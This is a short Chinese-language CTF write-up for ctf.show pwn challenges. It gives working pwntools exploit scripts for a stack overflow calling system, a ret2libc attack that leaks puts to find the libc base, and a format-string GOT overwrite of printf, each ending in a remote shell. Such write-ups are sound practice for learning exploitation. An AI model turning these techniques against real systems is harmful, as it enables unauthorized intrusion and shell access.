https://ctf.show/challenges
Pwn签到
Pwn2
EXP
1 2 3 4 5 6 7 8 9 10 11
| from pwn import * sh = process("./stack") sh = remote("124.156.121.112",28032) elf = ELF("./stack") system = elf.sym["system"] binsh = elf.search("/bin/sh").next() payload = "a"*13 payload += p32(system)+p32(system)+p32(binsh) sh.recvuntil("\n") sh.sendline(payload) sh.interactive()
|
Pwn3
- 这回程序内找不到system和binsh了,想了一会,思考了一会,看到有puts函数,那干脆libc一把梭吧….
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
| from pwn import *
sh= remote('124.156.121.112',28065) elf = ELF("./stack1")
libc = ELF("./libc6-i386_2.27-3ubuntu1_amd64.so") puts_got_addr =elf.got['puts'] puts_plt_addr =elf.plt['puts'] main_addr = elf.sym['_start'] payload = "a"*13 payload += p32(puts_plt_addr) payload += p32(main_addr) payload += p32(puts_got_addr) sh.recvuntil("!\n") sh.sendline(payload) sh.recvuntil("\n\n") puts_addr = u32(sh.recv(4)) print hex(puts_addr) libc_puts_addr = int(libc.sym['puts']) base_addr = puts_addr-libc_puts_addr system_addr = base_addr+int(libc.sym['system']) binsh_addr = base_addr+int(libc.search('/bin/sh').next()) max_payload = "a"*13 success("Base_Addr:0x%x",base_addr) max_payload += p32(system_addr) max_payload += p32(main_addr) max_payload += p32(binsh_addr) sleep(1) sh.recvuntil("\n") sleep(1) sh.sendline(max_payload) sh.interactive()
|
Pwn4
checksec程序,发现32位程序,且只有PIE没开,眉头一紧,预感大事不妙
拖到IDA里看一下,printf函数没有格式化输出,很好字符串格式化漏洞出来了,并且在程序中有一个getshell
函数,作用居然是直接可以返回shell,还好还好
接下来就很好解决了,有两个办法,一是直接劫持EIP将其指向该函数,二是我们篡改printf函数
以第二个为例,我们可以将printf函数的got表地址修改为system函数的内存地址,结果是当程序执行到printf函数时,其实是执行的system函数,而程序正好有两次输入输出,可以在第一次输入时篡改printf函数,到第二次输入时,我们只用传进去/bin/sh
,那么程序在执行printf(&buf)
时,实际执行的却是system('/bin/sh')
。
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13
| from pwn import * sh = process("./ex2") sh = remote("124.156.121.112",28050) elf=ELF("./ex2") printf = 0x0804A014 system = elf.sym['system'] payload = fmtstr_payload(6,{printf:system}) sh.recvuntil("Hacker!\n") sh.sendline(payload) sleep(2) sh.recvuntil("\n") sh.sendline("/bin/sh\x00") sh.interactive()
|